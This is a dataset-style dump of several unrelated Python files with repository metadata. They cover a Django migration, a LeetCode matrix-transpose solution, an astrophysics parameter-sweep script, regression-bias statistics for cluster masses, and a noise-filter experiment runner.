8531d5d6b9c1ce71600a47c0591f26494c47860b | e22c17c4f6b83a48a5bbe75bc35ad2132d93ebce | /opl/migrations/0008_auto_20200305_1559.py | 42b9942ce85a1c8cd5a98bd086312d86a9ec9375 | [] | no_license | MATT143/Snippets | f568b4117f2fe097ea5611e0bab764c4e13bb724 | 17a816b926a3ec5e9658739801d6bf3095b0128a | refs/heads/master | 2022-04-23T01:40:50.447026 | 2020-04-18T04:09:25 | 2020-04-18T04:09:25 | 256,666,806 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 576 | py | # Generated by Django 2.2.11 on 2020-03-05 10:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('opl', '0007_auto_20200305_1302'),
]
operations = [
migrations.AddField(
model_name='oplorderdetails',
name='subscriptionId',
field=models.CharField(default=None, max_length=20),
),
migrations.AlterField(
model_name='oplorderdetails',
name='subRefId',
field=models.CharField(max_length=20),
),
]
| [
"mnahak@cisco.com"
] | mnahak@cisco.com |
6415c261c52b6628e5b7cacc8a70924cc04f753a | 53ed8b8d650439ba9aac764f5de5d96b67cbd77a | /867. Transpose Matrix.py | b2f1e40fd1c10e63a14c2f6c0f60df89da6dad8c | [] | no_license | IrwinLai/LeetCode | df49d152b4bf439c966afa53eecfe3022fb043ae | 779c3a98d9052a12d319c0219324e5d0f5517fc6 | refs/heads/master | 2021-07-03T08:02:55.425285 | 2021-03-21T11:19:46 | 2021-03-21T11:19:46 | 221,848,796 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | class Solution:
def transpose(self, A: List[List[int]]) -> List[List[int]]:
ret = [[] for i in range(len(A[0]))]
for r in range(len(A)):
for c in range(len(A[0])):
ret[c].append(A[r][c])
return ret | [
"noreply@github.com"
] | IrwinLai.noreply@github.com |
294df0914a41007122338f4e5fa1725bdd8373de | ed257bb11c2916f8e849a753911f9cf866687774 | /code/experiment_001.py | a5b859e304fa0846047472a516150bb217036621 | [
"MIT"
] | permissive | forero/BetaSkeleton | 737000f5f0a132a0040b5184c90a803490cbcdd9 | 9714f11904bb9c990285815bd29303c08d6aafac | refs/heads/master | 2020-04-06T03:57:08.299294 | 2014-07-31T20:39:14 | 2014-07-31T20:39:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,228 | py | from subprocess import call
total_mocks = 27
base_mass = [1.0E13]
base_f_in = [1.0]
rsd_options = [1,0]
beta_values = [1,2,5,10,20,30]
min_theta=90.0
max_theta=180.0
min_phi=[0.0,89.0]
max_phi=[1.0,90.0]
min_r=0.0
max_r=2000.0
omega_m_values = [0.30]
w_values = [-1.0]
for i_mock in range(total_mocks):
for rsd in rsd_options:
for beta in beta_values:
for i_mass, i_f_in in zip(base_mass, base_f_in):
for i_min_phi, i_max_phi in zip(min_phi, max_phi):
for w in w_values:
for omega_m in omega_m_values:
command_all=\
"make -f Makefile %s MOCK_ID=%02d BETA=%d CUT_MASS=%.1E FRAC=%.4f \
RSD=%d MIN_THETA=%.1f MAX_THETA=%.1f MIN_PHI=%.1f MAX_PHI=%.1f MIN_R=%.1f MAX_R=%.1f \
OMEGA_M=%.2f OMEGA_L=%.2f W=%.1f" \
%("all", i_mock, beta, i_mass, i_f_in, rsd, min_theta, max_theta, \
i_min_phi, i_max_phi, min_r, max_r, omega_m, 1.0 - omega_m, w)
print command_all
retcode = call(command_all,shell=True)
| [
"j.e.forero.romero@gmail.com"
] | j.e.forero.romero@gmail.com |
4dde39c66097431c01d8dbfe496e121fd7f4e9b6 | a1b42a61f2f179ee0a12746d9526253ab3a407c8 | /data/boada/analysis_all/MLmethods/calc_errors_ML.py | d3e84a3acc0ac2df776c97a138a636a2b70de5ae | [
"MIT"
] | permissive | sazabi4/vpCluster | 1436c3df8d6721d67ef7dcc68c381b2bd776c45b | d0bf5e209c83b3d7781997066d61181fe60bf3af | refs/heads/master | 2021-01-16T21:27:29.776100 | 2016-04-26T20:36:21 | 2016-04-26T20:36:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,588 | py | import numpy as np
import h5py as hdf
from scipy import stats
def error(true, pred, mu):
''' Unused, but kept to see how I did it when I wasn't using the Scipy
functions. Calculates the error on the mean.
'''
print true.size,
if true.size > 1:
var = np.sum((pred - true - mu)**2) /(true.size - 1)
sem = np.sqrt(var/true.size)
return sem
elif true.size == 1:
return 0
else:
return np.nan
def bias(true, pred):
''' unused, but calculates the mean bias. '''
if true.size > 0:
return np.sum(pred - true) /true.size
#return np.median(true)
else:
return np.nan
def runningStatistic(stat, true, pred, **kwargs):
''' b = bias and s = uncertainty on that bias '''
bins = np.arange(11.5,16,0.5)
indx = np.digitize(true, bins)-1
binNumber = len(bins)
runningb = []
runnings = []
for k in xrange(binNumber):
print true[indx==k].size,
b = np.mean(pred[indx==k] - true[indx==k])
s = stats.sem(pred[indx==k] - true[indx==k])
print '$%.2f\pm{%.2f}$ &' % (b,s)
try:
mean, var, std = stats.mvsdist(pred[indx==k] - true[indx==k])
#print '$%.2f\pm{%.2f}$ &' % (std.mean(),std.std()),
except ValueError:
pass
#print '$%.2f\pm{%.2f}$ &' % (np.nan,np.nan),
runningb.append(b)
runnings.append(s)
print ''
return
### Targeted ###
################
with hdf.File('./buzzard_targetedRealistic_masses.hdf5', 'r') as f:
dset = f[f.keys()[0]]
target = dset['M200c', 'MASS', 'ML_pred_1d', 'ML_pred_2d', 'ML_pred_3d']
# filter bad values
mask = (target['ML_pred_1d'] != 0)
target = target[mask]
for d in [target]:
### Full survey ###
mean, var, std = stats.mvsdist(np.log10(d['MASS']) - np.log10(d['M200c']))
s = stats.sem(np.log10(d['MASS']) - np.log10(d['M200c']))
#print '$%.2f\pm{%.3f}$' % (mean.mean(),s)
print '$%.2f\pm{%.3f}$' % (std.mean(), std.std())
print('power law')
running = runningStatistic(bias, np.log10(d['M200c']),
np.log10(d['MASS']))
############
#### 1d ####
############
print('1d')
running = runningStatistic(bias, np.log10(d['M200c']),
d['ML_pred_1d'])
#############
#### 2d #####
#############
print('2d')
running = runningStatistic(bias, np.log10(d['M200c']),
d['ML_pred_2d'])
##############
##### 3d #####
##############
print('3d')
running = runningStatistic(bias, np.log10(d['M200c']),
d['ML_pred_3d'])
print '-----'
| [
"stevenboada@gmail.com"
] | stevenboada@gmail.com |
3ff28d2310a0f022eadd873154775534e6ed3f7d | 4936c1d20aef7a93ad2ded2f5731b102631ad8b2 | /Tablas/tablas/Ruido20/maxVotos/EF/menu_1.py | bbbc4a429fa3ea9ad1f3048aeb9cae99d255b9a6 | [
"LicenseRef-scancode-other-permissive"
] | permissive | jcarlosorte/pyMIL-BNF | 530f60081607deecfee7c72264000c0ba34984fe | 36e282e35242815bf57310db98707da70d69b183 | refs/heads/master | 2022-11-12T20:58:49.058513 | 2020-07-06T15:35:01 | 2020-07-06T15:35:01 | 182,646,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,214 | py | # -*- coding: utf-8 -*-
"""
Created on Fri May 10 10:11:00 2019
@author: Usuario
"""
import sys,os,warnings
os.chdir('../../../../MILpy')
sys.path.append(os.path.realpath('..'))
warnings.filterwarnings('ignore')
#from funciones import fvc
from filters import EF
from filters import CVCF
from filters import IPF
folds = 5
votacion = 'maxVotos'
DataSet = ['musk1_scaled']
#ruido = [0,5,10,15,20,25,30]
ruido = [20]
#print('********** Crear dataset con ruido **********')
#fvc.fvc_part(DataSet,folds,ruido)
print('********** Ensemble Filter por '+str(votacion)+'**********')
EF.EF(DataSet,votacion,folds,ruido)
#print('********** CV Committees Filter por '+str(votacion)+'**********')
#CVCF.CVcF(DataSet,votacion,folds,ruido)
#print('********** Iterative Partitioning Filter por '+str(votacion)+'**********')
#IPF.IPF(DataSet,votacion,folds,ruido)
#votacion = 'maxVotos'
#print('********** Ensemble Filter por '+str(votacion)+'**********')
#EF.EF(DataSet,votacion,folds,ruido)
#print('********** CV Committees Filter por '+str(votacion)+'**********')
#CVCF.CVcF(DataSet,votacion,folds,ruido)
#print('********** Iterative Partitioning Filter por '+str(votacion)+'**********')
#IPF.IPF(DataSet,votacion,folds,ruido) | [
"jcarlosorte@ugr.es"
] | jcarlosorte@ugr.es |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.